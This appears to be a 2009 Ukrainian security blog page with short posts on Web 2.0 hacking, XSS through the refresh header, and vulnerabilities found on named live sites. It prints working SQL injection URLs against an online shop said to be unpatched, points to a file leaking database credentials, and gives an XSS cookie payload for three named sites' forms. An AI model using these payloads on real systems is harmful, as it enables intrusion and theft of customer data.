Хакінг Веб 2.0 - Захист AJAX та Веб Сервісів
22:45 04.07.2009В своїй презентації Hacking Web 2.0 - Defending Ajax and Web Services, Shreeraj Shah розповідає про хакінг Веб 2.0. Про захист AJAX додатків та Веб Сервісів.
В своїй презентації Hacking Web 2.0 - Defending Ajax and Web Services, Shreeraj Shah розповідає про хакінг Веб 2.0. Про захист AJAX додатків та Веб Сервісів.
В своєму записі Firefox Header Redirection JavaScript Execution, RSnake ще в березні 2007 розповів про знайдену ним можливість виконання JavaScript коду через редирекцію через серверні заголовки. Він використав редирекцію з часовою затримкою (в декілька секунд), для виконання JS через редирекцію через заголовок refresh.
Дана атака спрацювала в нього лише в Firefox (в мене дана атака також спрацювала в Mozilla). А в коментарях до запису, читачі сайту зазначили, що в Safari дана атака також працює.
Нещодавно я писав про Cross-Site Scripting уразливості в Mozilla, Internet Explorer, Opera та Chrome, що я знайшов 28.06.2009. В даному випадку також використовується заголовок refresh.
Але на відміну від Роберта aka RSnake, в моєму дослідженні йдеться не лише про уразливість в Firefox (і в браузерах на движку Мозіла), а взагалі в усіх браузерах (зокрема тих, що є в мене). І серед усіх браузерів дана уразливість була виправлена лише в Firefox 3.0.9.
Іншою визначальною особливістю мого метода є те, що це редирекція без затримки (тобто з нульовою затримкою). Яка і дозволяє даній атаці через заголовок refresh працювати в усіх браузерах (з числа мною перевірених). Тому даний метод є цікавим вектором XSS атак.
В даній добірці уразливості в веб додатках:
У жовтні, 02.10.2008, я знайшов Cross-Site Scripting, Insufficient Anti-automation, SQL Injection, Abuse of Functionality та Information Leakage уразливості на сайті http://datingsites1000.com. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше.
21.04.2009
У липні, 24.07.2008, я виявив Full path disclosure, SQL Injection та Information Leakage уразливості на сайті http://tvshop.com.ua (інтернет магазин), що також доступний за адресою http://i-shop.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.cddoma.com.ua.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
03.07.2009
Full path disclosure:
http://tvshop.com.ua/itemlist.php?cid=’
http://tvshop.com.ua/item.php
http://tvshop.com.ua/itemlist.php
http://tvshop.com.ua/catalog.php
SQL Injection:
http://tvshop.com.ua/itemlist.php?cid=-1%20or%20version()=4.0
http://tvshop.com.ua/catalog.php?cid=-1%20union%20select%201,version(),1,1,1/*
MySQL 4.0.27-standard-log
Зазначу, що в таблиці клієнтів магазину в БД торік, 24.07.2008, було 17197 записів. А сьогодні, майже через рік, 18112 записів. Тобто майже за рік у магазина збільшилося число клієнтів на 915. А хтось тут про кризис росказує
.
Information Leakage:
http://tvshop.com.ua/init.tpl
Витік login, password і name для бази даних та Source Code Disclosure.
Дані уразливості досі не виправлені.
В даній добірці експлоіти в веб додатках:
У липні, 18.07.2008, я знайшов Cross-Site Scripting уразливості на сайтах http://www.linkexchanger.ru, http://www.od.com.ua і http://www.lishnih.net. Що використовують веб додаток LinksExchanger, про уразливості в якому я писав нещодавно.
XSS:
POST запит на сторінках linkexchanger.ru/dir/submit.php, od.com.ua/links/submit.php і lishnih.net/catalog/submit.php.
"><body onload="alert(document.cookie)В полях: Ваше имя или ник, Текстовое описание Вашей ссылки.
XSS через GET:
http://www.linkexchanger.ru
http://www.od.com.ua
http://www.lishnih.net
Продовжуючи тему експлоітів для Apache, пропоную вам нову добірку експлоітів для цього веб сервера.
Дані експлоіти для уразливостей в Apache Tomcat та Apache mod_dav / svn. Адмінам варто слідкувати за оновленням своїх серверів.
Виявлене пошкодження пам’яті в Adobe Shockwave Player.
Уразливі версії: Adobe Shockwave Player 11.5.
Пошкодження пам’яті при відкритті файлів Adobe Director 10.
В даній добірці уразливості в веб додатках: